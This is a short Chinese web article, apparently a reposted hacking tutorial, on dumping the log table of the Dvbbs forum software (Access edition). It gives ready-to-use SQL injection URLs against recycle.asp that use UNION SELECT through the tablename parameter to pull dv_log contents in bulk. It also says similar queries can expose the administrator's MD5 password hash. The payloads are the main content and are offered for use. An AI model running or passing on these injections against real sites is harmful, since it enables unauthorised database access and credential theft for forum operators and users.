动网access版暴log库终极大法
人气:0想了解动网access版暴log库终极大法的相关内容吗,在本文为您仔细讲解的相关知识和一些Code实例,欢迎阅读和指正,我们先划重点:动网网aacccceessss版版暴暴lloogg库库终终极极大大法法,下面大家一起来学习吧。
注:需要获得前台管理员权限后使用
文章中指定recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000(回收站的最后页的id),指变换l_id=‘'的值来暴出l_concent的值一次只能暴一个内容,看了下动网的数据库表,只要指定l_announceid=0就可以全部暴出,语句这样构造recycle.asp?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1,1%20from%20dv_bbs1&page=2000嘿嘿,是不是全部暴出来了,构造适当的语句可以暴出管理员的后台md5值等等内容。另注:暴出数据字段的内容是回收站帖子的最后页!
加载全部内容